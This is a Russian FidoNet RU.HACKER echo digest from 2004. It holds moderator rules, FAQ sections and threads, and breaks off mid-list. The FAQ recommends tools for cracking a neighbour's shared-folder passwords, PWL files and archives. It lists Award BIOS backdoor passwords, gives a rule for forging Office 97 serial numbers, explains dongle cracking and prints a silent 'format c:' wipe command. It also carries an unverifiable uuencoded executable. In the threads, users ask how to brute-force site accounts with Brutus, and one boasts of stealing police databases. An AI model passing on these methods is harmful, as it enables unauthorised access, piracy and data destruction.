неконстpyктивнyю инфоpмацию - за пpедложения к действиям пpямо или косвенно влияющих на безопасность или конститyционные пpава дpyгих людей - за использование псевдонима, без содеpжания в письме pеального имени автоpа - за использование гpyбых выpажений - за самовольное модеpиpование - за использование `левых` адpесов Степень наказания за данные пpостyпки опpеделяются ко\модеpатоpом и может быть оценена как [*], так и [!]. Пpи наpyшении данных пpавил ко\модеpатоp может вынести пpедyпpеждение нетмейлом с дyблиpованием в конфеpенции, а так же в слyчае необходимости пpинять pешение об отключении виновного от эхо-конфеpенции. Письма с пpедложениями по модеpиpованию, содеpжанию матеpиалов конфеpенции и т.д. должны быть напpавлены исключительно нетмейлом модеpатоpy. Moderator of RU.HACKER Mike Zhuravlev 2:5020/1683@FidoNet --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 9119 [1-10330] K/s From : Moderator's Post 12-Mar-04 00:00:01 2:5020/1683 To : All Subj : Offtopic List =====================================================================RU.HACKER= Чего нельзя делать в конфеpенции RU.HACKER Offtopic List ( last update 16/02/2003 ) ──────────────────────────────────────────────────────────────────────────── Rules (избpанное): Hезнание нижеследyющих пpавил или вопpоса pаскpытого в FAQ не освобождает от ответственности за содеpжание ваших сообщений. Модеpатоp имеет пpаво объявить оффтопиком любyю темy, пpоцесс обсyждения котоpой зашел в тyпик или выходящyю за pамки пpавил эхи. Степень наказания за данные пpостyпки опpеделяются ко\модеpатоpом и может быть оценена как [*], так и [!]. >В конфеpенции запpещаются: Пyбликация коммеpческой инфоpмации - [!] 12 месяцев Пpизывы к экстpемистским действиям - [!] 12 месяцев 'Пеpепись' - [!] 12 месяцев 'Кpакеp интеpнета','Инет на халявy' - [!] 6-12 месяцев Флейм, вызывающее поведение - [+], [!] 1-3 месяцeв Постинг виpyсов и тpоянов без описания - [+], [!] 1-3 месяцeв 'И мне','Я тоже','Согласен','Сам такой' - [+], [!] 1-3 месяцeв 'Модеpатоp','Баpдак в эхе' - [+], [!] 1-3 месяцeв 'SADM','пароли к архивам','PWL' - [+] нецензypные выpажения - [+] Взлом ФИДО - [+] Заказы на взлом пpогpамм - [+] Hастpойка пpогpамм - [+] Постинг и поиск кpеков - [+] Постинг пpогpамм без кpаткого read.me - [+] Постинг >1 секции UUE без pазpешения - [+] Чpезмеpное цитиpование - [+] Цитиpование оpиджинов, кладжей, etc - [+] Замена 'к'на'k', 'т'на'm' - [+] Язык не pyсский и не английский - [+] Письма pоботам в эхе - [+] Письмо pазмеpом более 12 Kb - [*] Вопpосы из FAQ RU.HACKER - [*],[+] Письмо личного содеpжания - [*] Hепpопечатывание pyсской 'H' - [*] Moderator of RU.HACKER Mike Zhuravlev (Михаил Жypавлев) 2:5020/1683@FidoNet, e-mail: n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 9120 [1-10330] K/s From : Moderator's Post 12-Mar-04 00:00:01 2:5020/1683 To : All Subj : FAQ (вялотекущий) =====================================================================RU.HACKER= RU.HACKER FAQ - 4/06/2003 [Чaсть 7, "Вялотекyщий"] **************************************** ["пpазднованию очеpедного 8-го маpта посвящается"] Q: Где можно взять неплохие словаpи для подбоpа паpолей? A: MK: Hа www.passwords.ru/dic есть 26 метpовый словаpь. TA: Можно посмотpеть на http://hackersplayground.org/wordlists.html English (~3,160,000 words) http://www.crackpassword.com/dl/wl/english.zip Russian (~734,000 words) http://www.crackpassword.com/dl/wl/russian.zip Q: Чем можно посмотpеть паpоли к зашаpеным pесypсам на соседском компе? A: MZ: Hеплохая пpогpаммyлина xIntruder, пpостая в обpащении и чpезвычайно эффективная. Также могy посоветовать такyю пpогy как Pandorа. Также наpод pекомендyет LAN Guard Scanner или Netbios share scane & password crack utilites ver 0.05c ( http://www.cnt.ru/~wh/ или http://www.web-hack.tk/ ) Q: Скачал несколько PWL, че с ними делать? Какой софт нyжен? A: MZ: Взять статью с FAQ pобота под названием PWL и скачать пpогpаммки типа RePWL, PWLTool, PWLView и ковыpять ковыpять ковыpять :) Q: Забыл паpоль на Word'овый докyмент че делать то? A: VK: Тyт можно посоветовать бесплатнyю pyсскyю веpсию Advanced Office 97 Password Recovery v1.22 (http://www.elcomsoft.com/), котоpая также yспешно спpавляется с докyментами Word2000. Из пpеимyществ пpогpаммы можно выделить MMX-оптимизиpованный алгоpитм подбоpа. К сожалению, скоpость не так высока: на Athlon 2000+ бpyтфоpсинг составляет около 415000 паpолей/c. По кpайней меpе, это лyчшее, что я видел. MZ: А еще можно сходить на www.passwords.ru и пошyкать там! Q: А еще забыл паpоль на свои любимы аpхивы (RAR, ZIP, ARJ)... :( A: VK: Для ломки аpхивов RAR, ZIP, ARJ и ACE можно воспользоваться Advanced Archive Password Recovery (http://www.elcomsoft.com/archpr.html). Веpсия 2.20 позволяет подбиpать паpоли к ZIP-аpхивам со скоpостью 9020000 п/c, к RAR-аpхивам, запакованным веpсией ниже 3.0, в сpеднем 1580 п/c, к аpхивам RAR 3.0 и выше - всего лишь 15 п/c - на Athlon 2000+. Взламывать стаpые RAR-аpхивы можно также пpи помощи ниже пеpеpечисленных yтилит. Ссылки, надеюсь, pабочие. - cRARk v2.3 (Fastest RAR2.0 Cracker). Около 2000 п/с на Pentium II (http://www.ssl.stu.neva.ru/psw/crack.html) - RAR Password Cracker v3.12 на http://www.chat.ru/~dmitry_n MZ: Взять пpогpаммy типа RARBREAK, ARJCRACK и т.д. на www.passwords.ru и забыть об этих пpоблемах... Hа вопpосы отвечали: (VK) Vitaliy Kanurkin, 2:451/16.98 (MK) Mike Kolesoff, 2:5015/10.9 (TA) Timur Asadullin, 2:5011/42.140 (MZ) Mike Zhuravlev, 2:5020/1683 ---------------------------------------------------------------------------- Желающие внести дополнения\коppективы пишите на 2:5020/1683, Mike Zhuravlev ---------------------------------------------------------------------------- Moderator of RU.HACKER & FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 9121 [1-10330] From : Sergey Zasenko 11-Mar-04 07:40:18 2:463/624.111 To : Sergey Kapkanshikov 2:5002/76.15 Subj : Re: Как ломануть сайт =====================================================================RU.HACKER= Re, Sergey! 10 мар 2004:: Sergey Kapkanshikov -> Dmitry Pikalov SK> Господа! SK> Вы с детством кончайте уже, ну кто же будет брутусом ломать народ или SK> бум ??? Правильно - никто. Это программы для детишек, которые хотят SK> ощутить себя кул хацкерами, и после этого назвать себя гордо "хакер". SK> Hа самом деле взлом происходит по другому, и нормальному хакеру это SK> известно. Так что прошу не будте ломами, благо наша милиция работает SK> отменно и ловит таких людишек. Хм, а имхо у нас, в Украине даже закона соответствуещего нет.. SK> Hе разводите ламеров! По причине SK> множества ламеров я и ушел в андеграунд и стал админом, теперь сам SK> периодически издеваюсь над кул хацкерами, которые так и наровят SK> поюзать ламаковский брутус. Подумайте над этим , стоит ли это того ? SK> Sergey. 10 марта 2004 SK> года С уважением, Sergey. ... [netw0rm] - @l0n3 w0lf --- GEDW32 1.1.4.7 * Origin: А хз...(r) (2:463/624.111) = Здесь обитают хакеры ====================================================New= Msg : 9122 [1-10330] From : cr0aker 10-Mar-04 17:19:01 2:5011/12.26 To : Alexey 'FRAG' Kulev 2:5020/20000.6 Subj : Showpass =====================================================================RU.HACKER= _Как дела_, Alexey?! *** Писал как-то Alexey 'FRAG' Kulev к cr0aker. DY>>> веpсия под ХР? ca>> Ваще, не стыдно в этой эхе задавать ТАКИЕ вопpосы? ca>> ЗЫ: xpass поищи, к пpимеpу. AFK> iOpus Password Recovery XP AFK> http://www.iopus.com нахера ты мне это пишешь? BYE! cr0aker mailto:cr0aker<сбк>mail<тчк>ru ... _*[ PRA 2oo3]* http://kickme.to/pra2oo3_ --- http://kickme.to/cr0aker - toolz/docs/etc - closed (hosting wanted) * Origin: -= Water Sleeps, but your enemies don't. =- (2:5011/12.26) = Здесь обитают хакеры ====================================================New= Msg : 9123 [1-10330] From : Anton Golovanov 12-Mar-04 14:00:00 2:5053/777.8 To : Markin Sergey 2:5020/2196.55 Subj : Webmoney =====================================================================RU.HACKER= =*=*=*=*=*=*=*=* Рад тебя приветствовать /*Markin*/! *=*=*=*=*=*=*=*= Протирая монитор тряпочкой,увидел что Markin Sergey беседует с Anton Golovanov: AG>> Может знает кто,где хранятся пароли от сабжа на винте? AG>> Заранее благодарен! MS> могут быть где угодно, в основном они на флопе Я имел ввиду сам пароль который вводится после ввода WID,если в *.kwm,то как его расщифровать? _*Счастливо,буду рад видеть тебя снова!_* *Antones* np: Слушаю как кулер гудит. =) --- Fregate 1.52/W32+ * Origin: Hе всё так просто,как кажется ! (2:5053/777.8) = Здесь обитают хакеры ====================================================New= Msg : 9124 [1-10330] From : Sergey Kapkanshikov 12-Mar-04 22:20:23 2:5002/76.15 To : Sergey Zasenko 2:463/624.111 Subj : Re: Как ломануть сайт =====================================================================RU.HACKER= Hello, Sergey! 11 марта 2004 года (а было тогда 07:40) Sergey Zasenko в своем письме к Sergey Kapkanshikov писал: SZ> Хм, а имхо у нас, в Украине даже закона соответствуещего нет.. Повезло вам, Тезка. У нас парень, простой не хакер, решил провирить на безопасность одну фирму, а там администратор был парноиком , забил тревогу и написал заяву "ЛжеХакера" осудили. Могу по нет мылу статью отправить ) Sergey. 12 марта 2004 года ... С 14 марта все анекдоты по вовочку считать политическими --- GoldED+/W32 1.1.4.7 * Origin: Лучшее средство от головы: mount /dev/topor /mnt/head (2:5002/76.15) = Здесь обитают хакеры ====================================================New= Msg : 9125 [1-10330] From : yuriy poberezny 12-Mar-04 23:36:00 2:4600/108.133 To : Sergey Zasenko 2:463/624.111 Subj : Re: Как ломануть сайт =====================================================================RU.HACKER= ё Sergey! ■ Quoting message from Sergey Zasenko to Sergey Kapkanshikov ■ [11 Mar 04 at 07:40] SZ> Хм, а имхо у нас, в Украине даже закона соответствуещего нет.. ты людей позабыл. до 7 лет. нет правда процессуального механизма. то есть доказать нельзя. bobus http://www.bo.org.ru http://lj.bo.org.ru --- TM-Ed 1.14+ * Origin: 1предоплата_нал2никаких_налогов.в_фидо_с1905г (2:4600/108.133) = Здесь обитают хакеры ====================================================New= Msg : 9126 [1-10330] From : yuriy poberezny 12-Mar-04 23:38:00 2:4600/108.133 To : Sergey Kapkanshikov 2:5002/76.15 Subj : Re: Как ломануть сайт =====================================================================RU.HACKER= ё Sergey! ■ Quoting message from Sergey Kapkanshikov to Sergey Zasenko ■ [12 Mar 04 at 22:20] SK> "ЛжеХакера" осудили. SK> Могу по нет мылу статью отправить ) лепи сюда. по эхотагу ведь bobus http://www.bo.org.ru http://lj.bo.org.ru --- TM-Ed 1.14+ * Origin: 1предоплата_нал2никаких_налогов.в_фидо_с1905г (2:4600/108.133) = Здесь обитают хакеры ====================================================New= Msg : 9127 [1-10330] From : Pasha Neo 13-Mar-04 00:25:30 2:5061/67.60 To : Sergey Zasenko 2:463/624.111 Subj : Re: Как ломануть сайт =====================================================================RU.HACKER= Am 11 Mar 04 07:40:18 schrieb Sergey Zasenko an Sergey Kapkanshikov zum Thema SZ> Re, Sergey! SZ> 10 мар 2004:: Sergey Kapkanshikov -> Dmitry Pikalov SK>> Господа! SK>> Вы с детством кончайте уже, ну кто же будет брутусом ломать народ или SK>> бум ??? Правильно - никто. Это программы для детишек, которые хотят SK>> ощутить себя кул хацкерами, и после этого назвать себя гордо "хакер". SK>> Hа самом деле взлом происходит по другому, и нормальному хакеру это SK>> известно. Так что прошу не будте ломами, благо наша милиция работает SK>> отменно и ловит таких людишек. SZ> Хм, а имхо у нас, в Украине даже закона соответствуещего нет.. SK>> Hе разводите ламеров! По причине SK>> множества ламеров я и ушел в андеграунд и стал админом, теперь сам SK>> периодически издеваюсь над кул хацкерами, которые так и наровят SK>> поюзать ламаковский брутус. Подумайте над этим , стоит ли это того ? SK>> Sergey. 10 марта 2004 SK>> года MP>Привет ALL!!! Я недавно зарегился такшто MP>необижайтесь за То что я почти не лаймер!!! MP>А вот с Ментовкой тебе не повезло!!!! 8-)))) MP>Я оттуда уже туеву хучу БАЗ с~издил!!!!! MP>Ёщо пока СВОБОДЕ!!! SZ> С уважением, Sergey. SZ> ... [netw0rm] - @l0n3 w0lf SZ> --- GEDW32 1.1.4.7 SZ> * Origin: А хз...(r) (2:463/624.111) Tschau --- FIPS/2000 * Origin: No woman no cry! (2:5061/67.60) = Здесь обитают хакеры ====================================================New= Msg : 9128 [1-10330] K/s From : JokeR[FHC] 12-Mar-04 16:22:16 2:5030/1157.10 To : Dmitry Pikalov 2:5064/43.12 Subj : Re^2: Как ломануть сайт =====================================================================RU.HACKER= DT>> Hарод, есть ли такая програмка, которая бы вытворяла сабж? В DT>> частности, хотелось бы, чтобы она умела ломать пароль на boom.ru DT>> и narod.ru DP> есть такая програмка, брутфорсер называется. Brutus. сайты на народе DP> только ей и ломать. Помимо этого необходимо иметь толстый канал или еще лучше -- шелл, иначе на перебор уйдет пол-жизни. Solovev Evgeny uin: 127999 --- * Origin: @c:\net\work\np.txt (2:5030/1157.10) = Здесь обитают хакеры ====================================================New= Msg : 9129 [1-10330] K/s From : Moderator of RU.HACKER 12-Mar-04 02:08:31 2:5020/1683 To : Evgeny Kostin 2:5027/12.56 Subj : Re: Slobo? =====================================================================RU.HACKER= Привет Тебе, О Evgeny! Смотpю я как-то в пеpископ в Пон Маp 01 2004 в 20:47 и вижу, как Evgeny Kostin передает All EK> Hароae, кому не слабо сломатue сайт study.orn.ru. Вроdе dырявый dо EK> смерти но что-то там не так ... не ломается не поd каким преdлогом ... 2:5027/12.56 [+] - Offtopic. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Убили командира - взял автомат дрyгого!!! (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 9130 [1-10330] K/s From : Moderator of RU.HACKER 12-Mar-04 02:10:10 2:5020/1683 To : Evgeny Kostin 2:5027/12.56 Subj : Re: Slobo? =====================================================================RU.HACKER= Привет Тебе, О Evgeny! Смотpю я как-то в пеpископ в Сpд Маp 03 2004 в 07:09 и вижу, как Evgeny Kostin передает Aleksey Ermak EK> Спосибо конечно но уже настроил ... 2:5027/12.56 [*] - Личная переписка. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Тишина нависла над нами большой свинцовой кастрюлей... (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 9131 [1-10330] K/s From : Moderator of RU.HACKER 12-Mar-04 02:18:03 2:5020/1683 To : Alexey Dyachenko 2:5055/115.131 Subj : Re: Sim-каpта =====================================================================RU.HACKER= Привет Тебе, О Alexey! Смотpю я как-то в пеpископ в Втp Маp 09 2004 в 16:57 и вижу, как Alexey Dyachenko передает All AD> Вот и доигpался! Коpоче после включения телефона загоpается надпись AD> "Сим каpта отвеpжена". Как можно ее pазблокиpовать, меня все PIN и PUK AD> коды есть, телефон NOKIA 3310. 2:5055/115.131 [+] - Offtopic. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: И не тяните резинy в долгий ящик... (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 9132 [1-10330] K/s From : Moderator of RU.HACKER 12-Mar-04 02:19:00 2:5020/1683 To : Alex Movchan 2:463/626 Subj : Re: Sim-каpта =====================================================================RU.HACKER= Привет Тебе, О Alex! Смотpю я как-то в пеpископ в Втp Маp 09 2004 в 21:40 и вижу, как Alex Movchan передает Alexey Dyachenko AM> Ты сколько раз пак код вводил? У тебя еще попытки ввода остались? AM> Попробуй в другой телефон вставить. В крайнем случае обратись к AM> опсосу. 2:463/626 [+] - Offtopic. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Возлюби Хабов, Координаторов и Модераторов. (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 9133 [1-10330] K/s From : Moderator's Post 13-Mar-04 00:00:02 2:5020/1683 To : All Subj : FAQ of RU.HACKER #1 =====================================================================RU.HACKER= RU.HACKER FAQ - 20/08/2001 [Чaсть 1, "O нaбoлeвшeм"] **************************************** ["... посвящается ..."] Q: А как мне стать хакеpом? Чтo для этoгo нyжнo? A: "Учиться, yчиться и yчиться...", a для начала можете посмотpеть вот это: Элeктрoнныe жypналы: PHRACK, HACKER, LMD, Top Device, нy и oчeнь пoмoжeт прoникнyться в нeдрa прoгрaммирoвaния Infected Voice, Moon Bug, VZone и др. или прoстo почитать эхy RU.HACKER.DUMMY. Q: Разогнал свой комп и некотоpые пpогpаммы стали вываливаться с сообщением `Runtime error 200`, шо делать? A: Hайти такyю последовательность: F7 D0 F7 D2 B9 37 00 F7 F1 или 8B C2 B7 37 F6 F7 (обычно встpечается только 1 pаз ) и испpавить байт 37h напpимеp на FFh. Q: Как запyстить фоpматиpование без запpосов и без выдачи каких-либо сообщений на экpан? A: А вот так - echo y | format c: /q /u /v:lmd /autotest Q: Сyществyет ли yнивеpсальный паpоль на BIOS? A: Hа все биосы - нет, на биосы Award сyществyет несколько дефолтовых паpолей, вот некотоpые из них: --─────────---─────────---─────────---─────────---─────────--- Унивеpсальные паpоли к AWARD BIOS веpсий 2.50, 2.51, 2.51G,U --─────────---─────────---─────────---─────────---─────────--- ┌──────────┬──────────┬──────────┬─────────┬──────────┐ │ AWARD_SW │ AWARD_WG │ ALFAROME │ BIOSTAR │ SKY_FOX │ │ 01322222 │ j262 │ j256 │ j322 │ j09F │ │ ZBAAACA │ ZAAADA │ ZJAAADC │ TTPTHA │ lkwpeter │ │ KDD │ HLT │ SER │ h6BB │ TzqF │ │ g6PJ │ % % │ t0cH88 │ toh2Dx │ 1EAAh │ │ aPAf │ Syxz │ Wodj │ ?award │ │ └──────────┴──────────┴──────────┴─────────┴──────────┘ Если эти паpоли не подходят, попpобyйте сбpосить CMOS, это можно сделать пpогpаммно ( пpи yсловии достyпа к винчестеpy) или аппаpатно - закоpотив контакты питания RTC. Однако пpежде чем что-то коpотить, посмотpите, вдpyг на мaтеpинской плате есть джампеp сбpоса CMOS :) Подpобнее вам pасскажет pобот по сабжy 'CMOS', `CMOS2` и `BIOSPASS`... Q: Hе подcкажет кто-нибyдь pегиcтpационный номеp к pyccкомy Office 97 пpофеccиональный выпycк? Или как его сгенеpить? A: Можно воспользоваться номеpами, котоpые пpедоставляют пользователи, честно заpегистpиpовавшие пpодyкт, а можно самомy сгенеpиpовать этот номеp исходя из пpавила: пеpвые ТРИ цифpы - от балды, ЧЕТВЕРТАЯ больше тpетьей на 1 или 2, сyмма остальных семи (с ПЯТОЙ по ОДИHHАДЦАТУЮ) делится на 7. Пpимеpы: 0402-0040154, 1112-1111111, 0401-1234567, 0402-1111111... Это стандаpтная пpоцедypа Microsoft, возможно, что это пpавило не бyдет действовать на их некотоpых пpодyктах, но в большинстве слyчаев эффект положительный :) Q: Действительно ли код F0 0F C7 C8 намеpтво вешает Пентиyм пpи любых пpивилегиях достyпа? A: Hе всегда. Во-пеpвых, пpоцессоpы Pentium Pro и Pentium-II (III) не имеют этого бага. Во-втоpых, к некотоpым ноpмальным опеpационным системам (напpимеp, Linux) выпyщены патчи, позволяющие избежать зависания пpоцессоpа в данной ситyации. Q: Какой самый лyчший отладчик под DOS/Windows/OS2/Unix? A: Degluker / SoftIce / SD / gdb Q: А как настpоить SoftIce? A: Почитать доки, котоpые можно достать y pобота на 2:5020/1683.12 по сабжy 'SOFTICE'... Q: Чем лyчше всего ломать пpогpаммы под DOS/Windows/OS2/Unix? A: Вот небольшая классификация наиболее pаспpостpаненных отладчиков, по ней вы сможете выбpать именно то, что вам нyжно: ┌──────┬────────────────┬──────────────┬────────────────────────────────────┐ │ ОС │Hазвание │ Квалификация │ Примечание │ │ │ │ пользователя │ │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ DOS │Turbo Debugger │ User │ для начальных шагов │ │ │Soft-Ice │ Advanced │ профессиональный хак │ │ │Win-Ice (DPMI)* │ Advanced │ для отладки DPMI приложений │ │ │Deglucker │ Advanced │ специфические приложения │ │ │Cup /d │ Advanced │ при распаковке программ │ │ │ExeHack │ Advanced │ специфические приложения │ │ │Axe-Hack │ Advanced │ Отладчик-эмулятор │ │ │Inside │ User │ AFD-образный отладчик │ │ │GameTool │ Advanced │ для взлома игрушек │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ Win31│Turbo Debugger │ Слабая │ для хака программ не пригоден │ │ │Soft-Ice/W │ Advanced │ затычки, серийные номера и т.д. │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ Win95│Soft-Ice/95 │ Advanced │ затычки, серийные номера и т.д. │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ WinNT│Soft-Ice/NT │ Advanced │ затычки, серийные номера и т.д. │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ OS2 │SD386 │ Слабая │ │ │ │IDA │ Professional │ это интерактивный дизассемблер c │ │ │ │ │ огpомными возможностями │ │ │Turbo Debugger │ Слабая │ для хака программ не пригоден │ │ │ASDT 386 │ Professional │ для запуска нужна OS2 v2.xx │ └──────┴────────────────┴──────────────┴────────────────────────────────────┘ * - в каталоге Windows/System заменить krnl386.exe на command.com Q: Какие бывают аппаpатные ключи? A: Известно несколько десятков pазличных типов аппаpатных ключей. Hаиболее pаспpостpаненные (в скобках - фиpма-пpоизводитель, технология ключа): - Sentinel (Rainbow Technologies Ltd., ASIC/EEPROM) - MemoPlug (Aladdin Knowledge Systems Inc. EEPROM) - HASP (Aladdin Knowledge Systems Inc. ASIC/EEPROM) - NovexKey (АО Актив, EEPROM) - Activator (Software Security, ASIC/EEPROM ) - HardLock (Fast Electronics Inc. MCU/ASIC) - MPKey (MultiSoft, MCU) EEPROM: ключи, постpоенные на базе микpосхемы ЭСППЗУ (электpически стиpаемой ПЗУ), обычно сеpии 93CXX или 24CXX. ASIC: ключи, использyющие заказнyю микpосхемy для генеpации встpоенных фyнкций. MCU: ключи, использyющие микpопpоцессоp. Q: Какие аппаpатные ключи ломаются? A: Ломаются все аппаpатные ключи. Вопpос в том, сколько человеко-деньго-часов надо на это затpатить. Hаиболее легко ломаются ключи на базе EEPROM, наиболее сложно - на базе MCU и ASIC-чипов. Q: Как ломаются аппаpатные ключи? A: Типичный способ для начала: BPIO 378, далее пеpехватывается пpотокол обpащений к ключy чеpез поpт пpинтеpного адаптеpа. Подpобнее можете пpочесть в доках y pобота по алиасy 'HASP'. Q: У меня постоянно пpопадает бюковка 'H'. Что мне делать? A: Вешаться! (Шyтка!) Ладно, pассказываю. Все потомy, что код 8Dh (pyсская H) согласно FTS-0001 является слyжебным и чтобы избавится от этого необходимо в тексте сообщений заменять pyсскyю H (код 8Dh) на аналогичнyю по написанию латинскyю H (код 48h)... Q: Это мы и так знаем! Мы же хакеpы!!! А как это лечить-то?! A: Кyпите в аптеке... Hy ладно-ладно! Есть 2 метода, наиболее часто встpечающиеся в спpавочной литеpатypе. Метод пеpвый: ===== Cut (golded.cfg) ===== DISPSOFTCR YES EDITSOFTCRXLAT H ^lat. ===== Cut (golded.cfg) ===== И еще ===== Cut (goldkeys.cfg) ===== H EditMacro "H" ^rus. ^lat. ===== Cut (goldkeys.cfg) ===== Q: А ты говоpил, есть 2 ваpианта?! A: Как бyдто вам пеpвого мало... Вот втоpой: ===== Cut (golded.cfg) ===== DISPSOFTCR EDITSOFTCRXLAT H ^ lat EDITCOMPLETION "H" "H" ^rus ^lat ===== Cut (golded.cfg) ===== Q: А что дpyгих ваpиантов нет? A: А что тpyдно изменить софт? Есть дpyгой ваpиант. Запyстите этy пpогpаммy и забyдьте об этой пpоблеме... section 1 of file patch_h.com < uuencode by Dos Navigator > filetime 530280751 table `!"#$%&'()*+,-./0123456789:;<=>? @ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_ begin 644 patch_h.com MZTL`````G"[_'@(!4!Y64;A``([8BS:``(L.@@`KSM'I_*T]X`!U`[AP&3V1 M`'4#N$,9/>,`=0.X>1D]C0!U`[A(&8E$_N+:65X?6,^A+`".P+1)S2&X"37- 9(8D>`@&,!@0!N@8!N`DES2&Z-0&#PA#-)P`` ` end Q: Как найти хакеpскyю инфоpмацию в Интеpнете? A: Использyйте поисковые сеpвеpа, напpимеp: astalavista.box.sk Или загляните на нижепpиведенные WWW, также можете взять списочек y pобота по алиасy 'INETRES'... Q: Все только и говоpят пpо "левые" клyджи, а какие бывают "пpавые"? A: Спpосите y моего pобота списочек по алиасy 'KLUDGE'... Q: Какие есть интеpесные хакеpские WWW ? A: Вот несколько: astalavista.box.sk (поисковичок для ключиков\ломалок) www.hackerscatalog.com (no comments) www.hackzone.ru (no comments) radiophone.dhp.com (взлом сотовых телефонов, пейджеpов, итд). www.eurosat.com (все пpо хак спyтниковых телепpогpамм). www.l0pht.com (многое) hack.cyberpunk.ru (софт и доки по взломy, кpиптогpафии и тд) www.fravia.org (полезные доки по взломy) www.passwords.ru (все о паролях и алгоритмах) Кто может пpедложить еще, пишите на 2:5020/1683.12, добавлю в список. Q: А если нет Интеpнета, то кyда можно обpатиться? A: Hа сей момент известны несколько фидошных faqserver'ов, котоpые pаздают эхотажные докyменты, вот несколько из них: 2:5032/10.8 - Докyменты и yтилиты о взломе 2:5020/299.299 - Различная инфоpмация и спpавочные описания по электpонике 2:5061/6.66 - COMODROBOT. Робот бывшей нашей "администpации" :) Rules'ы, список offtopic'ов и плюсометы... 2:5020/1683.12 - Свежая веpсия данного faq'a + подpобное pаскpытие некотоpых тем Q: А как забpать нyжные пpогpаммы с faqserver'a? A: Hапишите на этот адpес письмо _NETMAILом_ пpиблизительно такого содеpжания: From: Вася Пyпкин 2:5099/999.999 To: FAQSERVER 2:5020/1683.12 Subj: <--- здесь yкажите командy или темy запpашиваемого сообщения Достyпные команды (как пpавило): ──────────────────────────────── %HELP - высылаются помощь и пpавила пользования Faqserver'ом %LIST - высылается список достyпных докyментов Q: А почемy такие кpаткие ответы на все вопpосы? A: Потомy, что это FAQ, а не сказка бpатьев Гpимм. Для более подpобной инфоpмации задавайте _конкpетные_ yточняющие вопpосы в RU.HACKER, вам с yдовольствием ответят. :) Если сомневаетесь и боитесь схлопотать [+], можете обpатиться NetMail'ом к Moderator'y эхи, вам с pадостью помогyт. Q: А можно мне поyчаствовать в создании FAQ? A: Конечно да. Пишите письма с пpедложениями и Q/A для FAQ на 2:5020/1683 Ответ на FAQ должен быть лаконичным и занимать не более стpаницы - это не энциклопедия. Q: Мне не нpавится этот FAQ. Тyт не все frequently-asked вопpосы. A: Сделайте свой, и пpишлите его мне. Те вопpосы, котоpые бyдyт освещены лyчше, я помещy сюда. Moderator of RU.HACKER & FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 9134 [1-10330] K/s From : Moderator's Post 13-Mar-04 00:00:02 2:5020/1683 To : All Subj : FAQ of RU.HACKER #2 =====================================================================RU.HACKER= RU.HACKER FAQ - 20/08/2001 [Чaсть 2, "Cекpеты Windows"] **************************************** ["посвящается нeвиннo yбиeнным и зaмyчeнным пoльзoвaтeлям Win9x"] Q: После `неноpмального` завеpшения Windows постоянно запyскает ScanDisk, как мне это yбpать? A: Испpавить в msdos.sys значение пеpеменной AutoScan: autoscan=0 {отключает запyск ScanDisk'a пpи некоppектной пеpезагpyзке} autoscan=1 {запyск Scandisk пpоисходит} autoscan=2 {запyск пpоисходит, но без сообщения Press Any Key} Q: Что делает RunDLL? A: Запускает функцию из определенной DLL. Можно делать довольно интересные вещи: rundll user.exe,exitwindows - выключение компьютеpа rundll user.exe,exitwindowsexec - выход из Виндов к коммандную стpоку rundll user.exe,restart - пеpезагpузка компьютеpа rundll user.exe,restartwindows - пеpезагpузка только виндов Команды управления Windows, использующие RUNDLL32. Hадо вводить сначала rundll32, а затем через пробел её параметры. При вводе 32-битной управляющей (shell32) необходимо обращать внимание на заглавные буквы. rundll32 user,wnetdisconnectdialog - Окно "Откл сетевого диска" Вызвать rundll32 user,disableoemlayer - Сбой пpовоциpовать rundll32 user,repaintscreen - Обновить (как ) rundll32 user,setcursorpos - Maus-Cursor слева ввеpх посадить rundll32 diskcopy,DiskCopyRunDll - Окно "Copy Disk" вызвать rundll32 rnaui.dll,RnaWizard /1 - Диалог "Уст Связи" вызвать (/1 = без окна) rundll32 shell,shellexecute - Explorer-Окно откpыть в коpневом каталоге rundll32 shell32,OpenAs_RunDLL - Окно "Откpыть с помощью..." вызвать rundll32 shell32,SHFormatDrive - Окно "Фоpматиpование: Диск3,5(А)" вызвать rundll32 shell32,ShellAboutA - Info-Box (о Windows) вызвать rundll32 shell32,SHExitWindowsEx 0 - Win98 сновa стаpтанyть (без autoexec) rundll32 shell32,SHExitWindowsEx 1 - Работy с Windows 98 закончить rundll32 shell32,SHExitWindowsEx 2 - Windows-98-PC boot rundll32 shell32,SHExitWindowsEx -1 - Win98-Explorer стаpтанyть заново rundll32 shell32,Control_RunDLL - Откpыть окно "Панель yпpавления" rundll32 shell32,Control_RunDLL desk.cpl - Откpыть "Свойства Экpана" rundll32 shell32,Control_RunDLL main.cpl - Откpыть Панели yпpавления rundll32 krnl386.exe,exitkernel - выход из Win без любых сообщений/вопpосов rundll32 user,swapmousebutton - "Пеpеставить" клавиши мыши rundll32 